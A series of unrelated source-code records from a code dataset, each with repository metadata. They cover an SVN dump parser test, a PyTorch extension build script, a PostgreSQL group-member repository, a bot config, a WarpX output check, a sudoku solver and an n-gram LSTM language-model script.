    revision['props'] = self.get_props()
    self.parse_blank()
    revision['nodes'] = self.parse_all_nodes()
    return number, revision

  def parse_all_revisions(self):
    """Parse every remaining revision record into self.parsed."""
    while self.current < len(self.lines):
      number, revision = self.parse_one_revision()
      if number in self.parsed:
        # NUMBER is the matched string, so format with %s: the previous
        # '%d' would itself raise a TypeError while reporting the error.
        raise SVNDumpParseError("duplicate revision %s at line %d"
                                % (number, self.current))
      self.parsed[number] = revision

  def parse(self):
    """Parse the whole dumpfile and return the nested dict described in
    the class docstring."""
    self.parsed['format'] = self.parse_format()
    self.parse_blank()
    self.parsed['uuid'] = self.parse_uuid()
    self.parse_blank()
    self.parse_all_revisions()
    return self.parsed
def compare_dump_files(message, label, expected, actual):
  """Parse the dump files EXPECTED and ACTUAL, both lists of lines as
  returned by run_and_verify_dump, and fail if their parsed revisions,
  nodes, properties, etc. differ.
  """
  expected_dump = DumpParser(expected).parse()
  actual_dump = DumpParser(actual).parse()
  if expected_dump != actual_dump:
    diff = ndiff(pprint.pformat(expected_dump).splitlines(),
                 pprint.pformat(actual_dump).splitlines())
    raise svntest.Failure('\n' + '\n'.join(diff))
0c071ed9df41f466f5e5d41975bd46e5709e4a48 | 321 | py | Python | furnace/seg_opr/sync_bn/src/cpu/setup.py | aurora95/RGBD_Semantic_Segmentation_PyTorch | b25ec3b398d7199386abd043a667c347df80884c | [
"MIT"
] | 1,439 | 2019-01-23T08:40:57.000Z | 2022-03-31T14:02:22.000Z | furnace/seg_opr/sync_bn/src/cpu/setup.py | aurora95/RGBD_Semantic_Segmentation_PyTorch | b25ec3b398d7199386abd043a667c347df80884c | [
"MIT"
] | 112 | 2019-01-25T02:31:26.000Z | 2021-09-23T08:42:37.000Z | furnace/seg_opr/sync_bn/src/cpu/setup.py | aurora95/RGBD_Semantic_Segmentation_PyTorch | b25ec3b398d7199386abd043a667c347df80884c | [
"MIT"
] | 287 | 2019-01-23T10:39:37.000Z | 2022-03-17T13:31:16.000Z | from setuptools import setup
# Build script for the `syncbn_cpu` C++ extension (the CPU half of the
# synchronized batch-norm op): compiles operator.cpp and syncbn_cpu.cpp
# into an importable module via PyTorch's cpp_extension helpers.
# NOTE(review): the `from setuptools import setup` line precedes this block.
from torch.utils.cpp_extension import BuildExtension, CppExtension
setup(
    name='syncbn_cpu',
    ext_modules=[
        CppExtension('syncbn_cpu', [
            'operator.cpp',
            'syncbn_cpu.cpp',
        ]),
    ],
    cmdclass={
        'build_ext': BuildExtension
    })
| 21.4 | 66 | 0.595016 | from setuptools import setup
# Build script for the `syncbn_cpu` C++ extension: compiles operator.cpp
# and syncbn_cpu.cpp into an importable module via PyTorch's
# cpp_extension helpers.
# NOTE(review): the `from setuptools import setup` line precedes this block.
from torch.utils.cpp_extension import BuildExtension, CppExtension
setup(
    name='syncbn_cpu',
    ext_modules=[
        CppExtension('syncbn_cpu', [
            'operator.cpp',
            'syncbn_cpu.cpp',
        ]),
    ],
    cmdclass={
        'build_ext': BuildExtension
    })
| 0 | 0 | 0 |
58e28e7b82d4f2753a7aaff2d479384d4cbc9beb | 6,605 | py | Python | core/recc/database/postgresql/mixin/pg_group_member.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | 3 | 2021-06-20T02:24:10.000Z | 2022-01-26T23:55:33.000Z | core/recc/database/postgresql/mixin/pg_group_member.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | null | null | null | core/recc/database/postgresql/mixin/pg_group_member.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from typing import List
from overrides import overrides
from recc.log.logging import recc_database_logger as logger
from recc.database.struct.group_member import GroupMember
from recc.database.struct.group_join_member import (
GroupJoinGroupMember,
ProjectJoinGroupMember,
)
from recc.database.interfaces.db_group_member import DbGroupMember
from recc.database.postgresql.mixin.pg_base import PgBase
from recc.database.postgresql.query.group_member import (
INSERT_GROUP_MEMBER,
UPDATE_GROUP_MEMBER_PERMISSION,
DELETE_GROUP_MEMBER,
SELECT_GROUP_MEMBER_BY_GROUP_UID_AND_USER_UID,
SELECT_GROUP_MEMBER_BY_GROUP_UID,
SELECT_GROUP_MEMBER_BY_USER_UID,
SELECT_GROUP_MEMBER_ALL,
SELECT_GROUP_MEMBER_JOIN_GROUP_BY_USER_UID,
SELECT_GROUP_MEMBER_JOIN_GROUP_BY_USER_UID_AND_GROUP_UID,
SELECT_GROUP_MEMBER_JOIN_PROJECT_BY_USER_UID,
)
| 42.339744 | 87 | 0.671915 | # -*- coding: utf-8 -*-
from typing import List
from overrides import overrides
from recc.log.logging import recc_database_logger as logger
from recc.database.struct.group_member import GroupMember
from recc.database.struct.group_join_member import (
GroupJoinGroupMember,
ProjectJoinGroupMember,
)
from recc.database.interfaces.db_group_member import DbGroupMember
from recc.database.postgresql.mixin.pg_base import PgBase
from recc.database.postgresql.query.group_member import (
INSERT_GROUP_MEMBER,
UPDATE_GROUP_MEMBER_PERMISSION,
DELETE_GROUP_MEMBER,
SELECT_GROUP_MEMBER_BY_GROUP_UID_AND_USER_UID,
SELECT_GROUP_MEMBER_BY_GROUP_UID,
SELECT_GROUP_MEMBER_BY_USER_UID,
SELECT_GROUP_MEMBER_ALL,
SELECT_GROUP_MEMBER_JOIN_GROUP_BY_USER_UID,
SELECT_GROUP_MEMBER_JOIN_GROUP_BY_USER_UID_AND_GROUP_UID,
SELECT_GROUP_MEMBER_JOIN_PROJECT_BY_USER_UID,
)
class PgGroupMember(DbGroupMember, PgBase):
    """PostgreSQL implementation of the group-member repository.

    Thin async wrappers around the prepared queries imported from
    recc.database.postgresql.query.group_member; every method logs its
    outcome through the shared database logger.
    """
    @overrides
    async def insert_group_member(
        self, group_uid: int, user_uid: int, permission_uid: int
    ) -> None:
        """Add USER_UID to GROUP_UID with the given permission."""
        query = INSERT_GROUP_MEMBER
        await self.execute(query, group_uid, user_uid, permission_uid)
        params_msg1 = f"group_uid={group_uid},user_uid={user_uid}"
        params_msg2 = f"permission_uid={permission_uid}"
        params_msg = f"{params_msg1},{params_msg2}"
        logger.info(f"insert_group_member({params_msg}) ok.")
    @overrides
    async def update_group_member_permission(
        self, group_uid: int, user_uid: int, permission_uid: int
    ) -> None:
        """Change the permission of an existing group membership."""
        query = UPDATE_GROUP_MEMBER_PERMISSION
        await self.execute(query, group_uid, user_uid, permission_uid)
        params_msg1 = f"group_uid={group_uid},user_uid={user_uid}"
        params_msg2 = f"permission_uid={permission_uid}"
        params_msg = f"{params_msg1},{params_msg2}"
        logger.info(f"update_group_member_permission({params_msg}) ok.")
    @overrides
    async def delete_group_member(self, group_uid: int, user_uid: int) -> None:
        """Remove USER_UID's membership in GROUP_UID."""
        query = DELETE_GROUP_MEMBER
        await self.execute(query, group_uid, user_uid)
        params_msg = f"group_uid={group_uid},user_uid={user_uid}"
        logger.info(f"delete_group_member({params_msg}) ok.")
    @overrides
    async def select_group_member(self, group_uid: int, user_uid: int) -> GroupMember:
        """Fetch a single membership; raise RuntimeError if absent."""
        query = SELECT_GROUP_MEMBER_BY_GROUP_UID_AND_USER_UID
        row = await self.fetch_row(query, group_uid, user_uid)
        params_msg = f"group_uid={group_uid},user_uid={user_uid}"
        if not row:
            raise RuntimeError(f"Not found group member: {params_msg}")
        # Assumes the query selects exactly one column (the remaining
        # GroupMember field) — TODO confirm against the query text.
        assert len(row) == 1
        result = GroupMember(**dict(row))
        result.group_uid = group_uid
        result.user_uid = user_uid
        logger.info(f"select_group_member({params_msg}) ok.")
        return result
    @overrides
    async def select_group_members_by_group_uid(
        self, group_uid: int
    ) -> List[GroupMember]:
        """List every membership of one group."""
        result: List[GroupMember] = list()
        async with self.conn() as conn:
            async with conn.transaction():
                query = SELECT_GROUP_MEMBER_BY_GROUP_UID
                async for row in conn.cursor(query, group_uid):
                    item = GroupMember(**dict(row))
                    item.group_uid = group_uid
                    result.append(item)
        result_msg = f"{len(result)} group members"
        logger.info(f"select_group_member_by_group_uid() -> {result_msg}")
        return result
    @overrides
    async def select_group_members_by_user_uid(
        self, user_uid: int
    ) -> List[GroupMember]:
        """List every membership held by one user."""
        result: List[GroupMember] = list()
        async with self.conn() as conn:
            async with conn.transaction():
                query = SELECT_GROUP_MEMBER_BY_USER_UID
                async for row in conn.cursor(query, user_uid):
                    item = GroupMember(**dict(row))
                    item.user_uid = user_uid
                    result.append(item)
        result_msg = f"{len(result)} group members"
        logger.info(f"select_group_member_by_user_uid() -> {result_msg}")
        return result
    @overrides
    async def select_group_members(self) -> List[GroupMember]:
        """List every group membership in the database."""
        result: List[GroupMember] = list()
        async with self.conn() as conn:
            async with conn.transaction():
                query = SELECT_GROUP_MEMBER_ALL
                async for row in conn.cursor(query):
                    result.append(GroupMember(**dict(row)))
        result_msg = f"{len(result)} group members"
        logger.info(f"select_group_members() -> {result_msg}")
        return result
    @overrides
    async def select_group_members_join_group_by_user_uid(
        self, user_uid: int
    ) -> List[GroupJoinGroupMember]:
        """List one user's memberships joined with their group rows."""
        result: List[GroupJoinGroupMember] = list()
        async with self.conn() as conn:
            async with conn.transaction():
                query = SELECT_GROUP_MEMBER_JOIN_GROUP_BY_USER_UID
                async for row in conn.cursor(query, user_uid):
                    result.append(GroupJoinGroupMember(**dict(row)))
        result_msg = f"{len(result)} group members"
        logger.info(f"select_group_members_join_group_by_user_uid() -> {result_msg}")
        return result
    @overrides
    async def select_group_member_join_group_by_user_uid_and_group_uid(
        self, user_uid: int, group_uid: int
    ) -> GroupJoinGroupMember:
        """Fetch one membership joined with its group row; raise
        RuntimeError if absent."""
        query = SELECT_GROUP_MEMBER_JOIN_GROUP_BY_USER_UID_AND_GROUP_UID
        row = await self.fetch_row(query, user_uid, group_uid)
        params_msg = f"user_uid={user_uid},group_uid={group_uid}"
        if not row:
            raise RuntimeError(f"Not found group member: {params_msg}")
        result = GroupJoinGroupMember(**dict(row))
        func_name = "select_group_member_join_group_by_user_uid_and_group_uid"
        logger.info(f"{func_name}({params_msg}) ok.")
        return result
    @overrides
    async def select_group_members_join_project_by_user_uid(
        self, user_uid: int
    ) -> List[ProjectJoinGroupMember]:
        """List one user's memberships joined with project rows."""
        result: List[ProjectJoinGroupMember] = list()
        async with self.conn() as conn:
            async with conn.transaction():
                query = SELECT_GROUP_MEMBER_JOIN_PROJECT_BY_USER_UID
                async for row in conn.cursor(query, user_uid):
                    result.append(ProjectJoinGroupMember(**dict(row)))
        result_msg = f"{len(result)} group members"
        logger.info(f"select_group_members_join_project_by_user_uid() -> {result_msg}")
        return result
| 5,246 | 441 | 23 |
99592ccd5d8bc11fb6dd4dfaba6811b648b23da0 | 62 | py | Python | podman/config.py | anushkrishnav/QiskitBot | 1aa2bca3f123a6f5d1c153306df8e1c7906f3394 | [
"MIT"
] | 26 | 2021-01-01T04:59:46.000Z | 2021-11-17T10:21:12.000Z | podman/config.py | anushkrishnav/QiskitBot | 1aa2bca3f123a6f5d1c153306df8e1c7906f3394 | [
"MIT"
] | null | null | null | podman/config.py | anushkrishnav/QiskitBot | 1aa2bca3f123a6f5d1c153306df8e1c7906f3394 | [
"MIT"
] | 3 | 2021-05-17T23:14:13.000Z | 2021-07-28T06:50:27.000Z | PREFIX = '!?'
# Bot runtime settings — presumably for the QiskitBot Discord bot
# (repo: anushkrishnav/QiskitBot); the command PREFIX constant precedes
# this block.  TODO confirm against the consuming module.
TOKEN = ''  # API token, intentionally blank in source; supply at deploy time
IMAGE = 'qiskitbot'  # container image name, presumably used for sandboxed runs
BLACKLIST = ['']  # blocked entries; ships with a single empty placeholder
| 12.4 | 19 | 0.548387 | PREFIX = '!?'
# Bot runtime settings — presumably for the QiskitBot Discord bot; the
# command PREFIX constant precedes this block.  TODO confirm usage.
TOKEN = ''  # API token, intentionally blank in source; supply at deploy time
IMAGE = 'qiskitbot'  # container image name, presumably used for sandboxed runs
BLACKLIST = ['']  # blocked entries; ships with a single empty placeholder
| 0 | 0 | 0 |
4cd48a2c66843372ff101898130ccd57eae579b8 | 954 | py | Python | Examples/Tests/openpmd_rz/analysis_openpmd_rz.py | hklion/WarpX | 3c2d0ee2815ab1df21b9f78d899fe7b1a9651758 | [
"BSD-3-Clause-LBNL"
] | null | null | null | Examples/Tests/openpmd_rz/analysis_openpmd_rz.py | hklion/WarpX | 3c2d0ee2815ab1df21b9f78d899fe7b1a9651758 | [
"BSD-3-Clause-LBNL"
] | null | null | null | Examples/Tests/openpmd_rz/analysis_openpmd_rz.py | hklion/WarpX | 3c2d0ee2815ab1df21b9f78d899fe7b1a9651758 | [
"BSD-3-Clause-LBNL"
] | null | null | null | #!/usr/bin/env python3
# Regression check: open the openPMD series written by the WarpX
# LaserAccelerationRZ test and assert the expected mesh layout
# (3 azimuthal modes, 512 z points, 64 r points).
import openpmd_api as io
series = io.Series("LaserAccelerationRZ_opmd_plt/openpmd_%T.h5", io.Access.read_only)
assert len(series.iterations) == 3, 'improper number of iterations stored'
ii = series.iterations[20]
assert len(ii.meshes) == 7, 'improper number of meshes'
# select j_t
jt = ii.meshes['j']['t']
# this is in C (Python) order; r is the fastest varying index
(Nm, Nz, Nr) = jt.shape
assert Nm == 3, 'Wrong number of angular modes stored or possible incorrect ordering when flushed'
assert Nr == 64, 'Wrong number of radial points stored or possible incorrect ordering when flushed'
assert Nz == 512, 'Wrong number of z points stored or possible incorrect ordering when flushed'
assert ii.meshes['part_per_grid'][io.Mesh_Record_Component.SCALAR].shape == [512,64], 'problem with part_per_grid'
assert ii.meshes['rho_electrons'][io.Mesh_Record_Component.SCALAR].shape == [3, 512, 64], 'problem with rho_electrons'
| 38.16 | 118 | 0.751572 | #!/usr/bin/env python3
# Regression check for WarpX RZ openPMD output: opens the HDF5 series written
# by the LaserAccelerationRZ test and validates iteration count, mesh count,
# and the stored field shapes.
import openpmd_api as io
series = io.Series("LaserAccelerationRZ_opmd_plt/openpmd_%T.h5", io.Access.read_only)
assert len(series.iterations) == 3, 'improper number of iterations stored'
# Inspect the checkpoint written at step 20.
ii = series.iterations[20]
assert len(ii.meshes) == 7, 'improper number of meshes'
# select j_t
jt = ii.meshes['j']['t']
# this is in C (Python) order; r is the fastest varying index
(Nm, Nz, Nr) = jt.shape
assert Nm == 3, 'Wrong number of angular modes stored or possible incorrect ordering when flushed'
assert Nr == 64, 'Wrong number of radial points stored or possible incorrect ordering when flushed'
assert Nz == 512, 'Wrong number of z points stored or possible incorrect ordering when flushed'
# Scalar records: part_per_grid is 2-D (z, r); rho_electrons keeps the mode axis.
assert ii.meshes['part_per_grid'][io.Mesh_Record_Component.SCALAR].shape == [512,64], 'problem with part_per_grid'
assert ii.meshes['rho_electrons'][io.Mesh_Record_Component.SCALAR].shape == [3, 512, 64], 'problem with rho_electrons'
| 0 | 0 | 0 |
4f8d1be2f84946250f10e20b9a4435d198236e44 | 92 | py | Python | muria/version.py | xakiy/muria | 0d16ae02f65d2a4b8cfe31419a4d9343ccbe6905 | [
"MIT"
] | 1 | 2020-02-10T00:12:27.000Z | 2020-02-10T00:12:27.000Z | muria/version.py | xakiy/muria | 0d16ae02f65d2a4b8cfe31419a4d9343ccbe6905 | [
"MIT"
] | 8 | 2019-12-07T16:48:08.000Z | 2021-08-31T06:31:34.000Z | muria/version.py | xakiy/muria | 0d16ae02f65d2a4b8cfe31419a4d9343ccbe6905 | [
"MIT"
] | null | null | null | name = 'Muria'
version = '0.5.3'
author = 'Ahmad Ghulam Zakiy <https://twitter.com/xakiy>'
| 23 | 58 | 0.663043 | name = 'Muria'
version = '0.5.3'
author = 'Ahmad Ghulam Zakiy <https://twitter.com/xakiy>'
| 0 | 0 | 0 |
a31f821d50afa26d576557149e66f9293e22c3b9 | 1,053 | py | Python | Project.py | JaikV/Sudoku-Solver- | b4bf1c13bb796c374b176ac702d3ba2ffde271b8 | [
"MIT"
] | null | null | null | Project.py | JaikV/Sudoku-Solver- | b4bf1c13bb796c374b176ac702d3ba2ffde271b8 | [
"MIT"
] | null | null | null | Project.py | JaikV/Sudoku-Solver- | b4bf1c13bb796c374b176ac702d3ba2ffde271b8 | [
"MIT"
] | null | null | null | from sys import stdin, setrecursionlimit
setrecursionlimit(10**7)
# Function to check all the valid way to solve the sudoku.
board = [[ int(ele) for ele in input().split() ]for i in range(9)]
ans = solveSudoku(board)
if ans is True:
print('true')
else:
print('false')
| 19.5 | 75 | 0.522317 | from sys import stdin, setrecursionlimit
setrecursionlimit(10**7)
def canPut(sudoku, row, col, num):
for i in range(9):
if(sudoku[i][col] == num or sudoku[row][i] == num):
return False
if(sudoku[3 * (row // 3) + i // 3][3 * (col // 3) + i % 3] == num):
return False
return True
# Function to check all the valid way to solve the sudoku.
def backTrack(sudoku, i, j):
if (j == 9):
if (i == 8):
return True
j = 0
i += 1
if (sudoku[i][j] != 0):
return backTrack(sudoku, i, j + 1)
# Trying all possible values.
for put in range(1, 10):
if (canPut(sudoku, i, j, put)):
sudoku[i][j] = put
if (backTrack(sudoku, i, j + 1)):
return True
sudoku[i][j] = 0
return False
def solveSudoku(sudoku):
backTrack(sudoku, 0, 0)
board = [[ int(ele) for ele in input().split() ]for i in range(9)]
ans = solveSudoku(board)
if ans is True:
print('true')
else:
print('false')
| 703 | 0 | 68 |
9fa3aba7df20e09b501665c510f94e4da52d2f16 | 13,389 | py | Python | lstm/src/language_models/ngram_lstm.py | brightp-py/rnng-and-rts | c1251de9bd4c35531cb46dbfb8b2c989ab5a1f33 | [
"MIT"
] | 1 | 2021-02-20T17:24:35.000Z | 2021-02-20T17:24:35.000Z | lstm/src/language_models/ngram_lstm.py | brightp-py/rnng-and-rts | c1251de9bd4c35531cb46dbfb8b2c989ab5a1f33 | [
"MIT"
] | null | null | null | lstm/src/language_models/ngram_lstm.py | brightp-py/rnng-and-rts | c1251de9bd4c35531cb46dbfb8b2c989ab5a1f33 | [
"MIT"
] | null | null | null | # Copyright (c) 2018-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
import argparse
import logging
import math
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from dictionary_corpus import Corpus, Dictionary, tokenize
from utils import batchify
import lm_argparser
parser = argparse.ArgumentParser(parents=[lm_argparser.lm_parser],
description="Training and testing ngram LSTM model")
parser.add_argument('--train', action='store_true', default=False,
help='enable training regime')
parser.add_argument('--test', action='store_true', default=False,
help='enable testing regime')
parser.add_argument('--test_path', type=str,
help='path to test file, gold file and vocab file output')
parser.add_argument('--suffix', type=str,
help='suffix for generated output files which will be saved as path.output_suffix')
args = parser.parse_args()
logging.basicConfig(level=logging.INFO, handlers=[logging.StreamHandler(),
logging.FileHandler(args.log)])
logging.info(args)
class RNNModel(nn.Module):
"""Container module with an encoder, a recurrent module, and a decoder.
ntoken: vocab size
nip: embedding size
"""
###############################################################################
# Training code
###############################################################################
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
if torch.cuda.is_available():
if not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
else:
torch.cuda.manual_seed(args.seed)
###############################################################################
# Load data
###############################################################################
if args.train:
logging.info("Loading data")
corpus = Corpus(args.data)
# logging.info(corpus.train)
ntokens = len(corpus.dictionary)
logging.info("Vocab size %d", ntokens)
logging.info("Batchying..")
eval_batch_size = 256
train_data = batchify(corpus.train, args.batch_size, args.cuda)
# logging.info("Train data size", train_data.size())
val_data = batchify(corpus.valid, eval_batch_size, args.cuda)
test_data = batchify(corpus.test, eval_batch_size, args.cuda)
logging.info("Building the model")
# model = torch.nn.DataParallel(model.RNNModel(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.tied),
# dim=1)
model = RNNModel(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.tied)
if args.cuda:
model.cuda()
# Loop over epochs.
lr = args.lr
best_val_loss = None
try:
for epoch in range(1, args.epochs+1):
epoch_start_time = time.time()
train()
val_loss = evaluate_perplexity(val_data)
logging.info('-' * 89)
logging.info('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | '
'valid ppl {:8.2f}'.format(epoch, (time.time() - epoch_start_time),
val_loss, math.exp(val_loss)))
logging.info('-' * 89)
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or val_loss < best_val_loss:
with open(args.save, 'wb') as f:
torch.save(model, f)
best_val_loss = val_loss
else:
# Anneal the learning rate if no improvement has been seen in the validation dataset.
lr /= 4.0
except KeyboardInterrupt:
logging.info('-' * 89)
logging.info('Exiting from training early')
# Load the best saved model.
with open(args.save, 'rb', encoding="utf8") as f:
model = torch.load(f)
# Run on valid data with OOV excluded
test_loss = evaluate_perplexity(val_data, exclude_oov=True)
logging.info('=' * 89)
logging.info('| End of training | test loss {:5.2f} | test ppl {:8.2f}'.format(test_loss, math.exp(test_loss)))
logging.info('=' * 89)
#####################################
# Testing #
#####################################
if args.test:
dictionary = Dictionary(args.data)
with open(args.save, 'rb', encoding="utf8") as f:
print("Loading the model")
if args.cuda:
model = torch.load(f)
model.cuda()
else:
# to convert model trained on cuda to cpu model
model = torch.load(f, map_location=lambda storage, loc: storage)
model.cpu()
model.eval()
eval_batch_size = 1
ntokens = len(dictionary)
#print("Vocab size", ntokens)
#print("TESTING")
# depends on generation script (constantly modified) - the column where the target word index is written
index_col = 3
mask = create_target_mask(args.test_path + ".text", args.test_path + ".gold", index_col)
mask_data = batchify(torch.LongTensor(mask), eval_batch_size, False)
test_data = batchify(tokenize(dictionary, args.test_path + ".text"), eval_batch_size, args.cuda)
f_output = open(args.test_path + ".output_" + args.suffix, 'w')
evaluate_on_mask(test_data, mask_data)
f_output.close()
| 36.284553 | 135 | 0.596609 | # Copyright (c) 2018-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
import argparse
import logging
import math
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from dictionary_corpus import Corpus, Dictionary, tokenize
from utils import batchify
import lm_argparser
parser = argparse.ArgumentParser(parents=[lm_argparser.lm_parser],
description="Training and testing ngram LSTM model")
parser.add_argument('--train', action='store_true', default=False,
help='enable training regime')
parser.add_argument('--test', action='store_true', default=False,
help='enable testing regime')
parser.add_argument('--test_path', type=str,
help='path to test file, gold file and vocab file output')
parser.add_argument('--suffix', type=str,
help='suffix for generated output files which will be saved as path.output_suffix')
args = parser.parse_args()
logging.basicConfig(level=logging.INFO, handlers=[logging.StreamHandler(),
logging.FileHandler(args.log)])
logging.info(args)
class RNNModel(nn.Module):
    """Container module with an encoder, a recurrent module, and a decoder.
    ntoken: vocab size
    ninp: embedding size

    Unlike a standard LM, forward() returns logits for the LAST time step
    only — the model scores the single word following an n-gram window.
    """
    def __init__(self, rnn_type, ntoken, ninp, nhid, nlayers, dropout=0.5, tie_weights=False):
        super(RNNModel, self).__init__()
        self.drop = nn.Dropout(dropout)
        self.encoder = nn.Embedding(ntoken, ninp)
        # LSTM/GRU are looked up directly on torch.nn; plain RNNs need the
        # nonlinearity spelled out.
        if rnn_type in ['LSTM', 'GRU']:
            self.rnn = getattr(nn, rnn_type)(ninp, nhid, nlayers, dropout=dropout)
        else:
            try:
                nonlinearity = {'RNN_TANH': 'tanh', 'RNN_RELU': 'relu'}[rnn_type]
            except KeyError:
                raise ValueError( """An invalid option for `--model` was supplied,
                                 options are ['LSTM', 'GRU', 'RNN_TANH' or 'RNN_RELU']""")
            self.rnn = nn.RNN(ninp, nhid, nlayers, nonlinearity=nonlinearity, dropout=dropout)
        self.decoder = nn.Linear(nhid, ntoken)
        # Optionally tie weights as in:
        # "Using the Output Embedding to Improve Language Models" (Press & Wolf 2016)
        # https://arxiv.org/abs/1608.05859
        # and
        # "Tying Word Vectors and Word Classifiers: A Loss Framework for Language Modeling" (Inan et al. 2016)
        # https://arxiv.org/abs/1611.01462
        if tie_weights:
            if nhid != ninp:
                raise ValueError('When using the tied flag, nhid must be equal to emsize')
            self.decoder.weight = self.encoder.weight
        self.init_weights()
        self.rnn_type = rnn_type
        self.nhid = nhid
        self.nlayers = nlayers
    def init_weights(self):
        """Uniformly initialize encoder/decoder weights in [-0.1, 0.1]; zero the decoder bias."""
        initrange = 0.1
        self.encoder.weight.data.uniform_(-initrange, initrange)
        self.decoder.bias.data.fill_(0)
        self.decoder.weight.data.uniform_(-initrange, initrange)
    def forward(self, input, hidden):
        """Embed `input`, run the RNN, and decode only the final time step.

        Returns a (batch_size, ntoken) logits tensor (no softmax applied).
        """
        emb = self.drop(self.encoder(input))
        output, hidden = self.rnn(emb, hidden)
        #print("hidden", hidden, hidden[0].size())
        # take last output of the sequence
        output = output[-1]
        #print(output)
        #decoded = self.decoder(output.view(output.size(0)*output.size(1), output.size(2)))
        #print(output.size())
        decoded = self.decoder(output.view(-1, output.size(1)))
        #print(output.view(output.size(0)*output.size(1), output.size(2)))
        #print(decoded)
        return decoded
    def init_hidden(self, bsz):
        """Return a zeroed initial hidden state for batch size `bsz`.

        LSTM needs an (h, c) tuple; other cell types take a single tensor.
        `weight.new(...)` keeps the state on the model's device/dtype.
        """
        weight = next(self.parameters()).data
        if self.rnn_type == 'LSTM':
            return (weight.new(self.nlayers, bsz, self.nhid).zero_(),
                    weight.new(self.nlayers, bsz, self.nhid).zero_())
        else:
            return weight.new(self.nlayers, bsz, self.nhid).zero_()
def get_batch(source, i, seq_length, evaluation=False):
    """Slice one (window, next-word) example out of `source` at row `i`.

    source: 2-D LongTensor of shape (tokens, batch_size).
    Returns (data, target): `data` is the window of up to `seq_length`
    rows starting at `i`; `target` is the single row that follows it,
    flattened to length batch_size — the word the model must predict.

    `evaluation` is accepted and ignored: callers in this file (e.g.
    evaluate_on_mask) pass evaluation=True, which made the original
    three-argument signature raise TypeError.
    """
    # Clamp the window so the target row i+seq_len stays inside `source`.
    seq_len = min(seq_length, len(source) - 1 - i)
    data = source[i:i+seq_len]
    #> predict the sequences shifted by one word
    target = source[i+seq_len].view(-1)
    return data, target
def create_target_mask(test_file, gold_file, index_col):
    """Build a flat 0/1 numpy mask marking one target token per sentence.

    test_file: one space-separated sentence per line.
    gold_file: parallel annotation lines; column `index_col` of each line
        holds the 0-based index of the target word within its sentence.
    Returns a 1-D numpy int array whose length is the total token count
    over all sentences, with exactly one 1 per sentence.
    """
    # Use context managers so both handles are closed promptly — the
    # original leaked two open file objects per call.
    with open(test_file, "r", encoding="utf8") as f:
        sents = f.readlines()
    with open(gold_file, "r", encoding="utf8") as f:
        golds = f.readlines()
    #TODO optimize by initializaing np.array of needed size and doing indexing
    targets = []
    for sent, gold in zip(sents, golds):
        # Gold columns: constr_id, sent_id, word_id, pos, morph
        target_idx = int(gold.split()[index_col])
        # split(" ") (not split()) on purpose: token count must match the
        # tokenization used when the flagged indices were generated.
        len_s = len(sent.split(" "))
        t_s = [0] * len_s
        t_s[target_idx] = 1
        targets.extend(t_s)
    return np.array(targets)
def evaluate_perplexity(data_source, exclude_oov=False):
    """Average per-token cross-entropy loss over `data_source`.

    Relies on module-level globals: `model`, `corpus`, `args`,
    `eval_batch_size`.  When `exclude_oov` is True, positions whose
    target is <unk> are dropped from both logits and targets before the
    loss is accumulated.
    """
    # Turn on evaluation mode which disables dropout.
    model.eval()
    total_loss = 0
    ntokens = len(corpus.dictionary)
    len_data = 0
    unk_idx = corpus.dictionary.word2idx["<unk>"]
    # Pre-allocate an index tensor on the right device, reused via
    # torch.arange(..., out=torch_range) below.
    if args.cuda:
        torch_range = torch.cuda.LongTensor()
    else:
        torch_range = torch.LongTensor()
    with torch.no_grad():
        for i in range(0, data_source.size(0) - 1):
            # Fresh zeroed hidden state per window: no state is carried
            # across windows (n-gram style evaluation).
            hidden = model.init_hidden(eval_batch_size)
            data, targets = get_batch(data_source, i, args.bptt)
            # The model decodes only the last position: (batch_size, vocab_size).
            output = model(data, hidden)
            output_flat = output.view(-1, ntokens)
            # excluding OOV
            if exclude_oov:
                subset = targets != unk_idx
                subset = subset.data
                targets = targets[subset]
                output_flat = output_flat[torch.arange(0, output_flat.size(0), out=torch_range)[subset]]
            # Weight each window's mean loss by its token count so the final
            # division yields a true per-token average.
            total_loss += targets.size(0) * nn.CrossEntropyLoss()(output_flat, targets).data
            len_data += targets.size(0)
    # NOTE(review): total_loss[0] indexes what is a 0-dim tensor on newer
    # PyTorch (needs .item() there) — confirm the pinned torch version.
    return total_loss[0] / len_data
def evaluate_on_mask(data_source, mask):
    """Emit vocabulary log-probabilities for the positions flagged in `mask`.

    `mask` is a batched 0/1 tensor parallel to `data_source`.  For each
    flagged target position, prints the target word and its log-prob, and
    writes the full vocabulary score row (tab-separated) to the global
    `f_output`.  Relies on module globals: `model`, `dictionary`, `args`,
    `eval_batch_size`, `ntokens`, `f_output`.
    """
    model.eval()
    idx2word = dictionary.idx2word
    for i in range(0, data_source.size(0) - 1):
        hidden = model.init_hidden(eval_batch_size)
        # NOTE(review): confirm get_batch accepts the `evaluation` keyword.
        data, targets = get_batch(data_source, i, args.bptt, evaluation=True)
        _, targets_mask = get_batch(mask, i, args.bptt, evaluation=True)
        #print(targets_mask.size())
        # The model decodes only the last position: (batch_size, vocab_size).
        output = model(data, hidden)
        output_flat = output.view(-1, ntokens)
        # NOTE(review): F.log_softmax without dim= is deprecated; here it
        # should normalize over the vocabulary axis — confirm torch version.
        log_probs = F.log_softmax(output_flat)
        # print("Log probs size", log_probs.size())
        # print("Target size", targets.size())
        log_probs_np = log_probs.data.cpu().numpy()
        # Boolean mask selecting the flagged batch positions for this window.
        subset = targets_mask.data.numpy().astype(bool)
        for scores, correct_label in zip(log_probs_np[subset], targets.data.cpu().numpy()[subset]):
